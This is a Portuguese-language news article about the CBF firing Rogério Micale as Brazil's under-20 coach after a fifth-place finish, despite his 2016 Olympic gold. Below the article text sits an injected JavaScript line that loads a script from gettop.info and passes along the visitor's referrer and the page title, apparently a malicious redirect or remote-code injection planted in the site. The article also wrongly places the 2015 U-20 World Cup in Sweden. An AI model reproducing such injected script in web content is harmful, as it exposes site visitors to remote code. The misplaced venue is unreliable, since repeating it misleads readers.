CBF demite técnico campeão olímpico

Micale deixa o cargo seis meses após conquistar medalha de ouro inédita. Lucas Figueiredo/Mowa Press

Rogério Micale não é mais técnico da Seleção Brasileira sub-20. A CBF decidiu demitir o treinador que conquistou o ouro inédito nas Olimpíadas do Rio de 2016, mas fracassou no Sul-Americano sub-20, que classificou quatro países para o Mundial 2017 da categoria (Equador, Uruguai, Argentina e Venezuela). O Brasil ficou na quinta colocação.

Micale assumiu a Seleção em maio de 2015, após uma má campanha também no Sul-Americano sub-20. Naquele ano, foi vice-campeão no Mundial, disputado na Suécia.

Em 2016, o treinador se tornou campeão olímpico. Com Neymar, Gabriel Jesus e Gabigol, conseguiu levar o Brasil à final contra Alemanha. Decidida nos pênaltis, o grupo obteve o único título que faltava ao futebol masculino brasileiro.

A escolha de um novo técnico pode ter a participação direta do coordenador de seleções, Edu Gaspar, e do comandante da Seleção principal, Tite.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário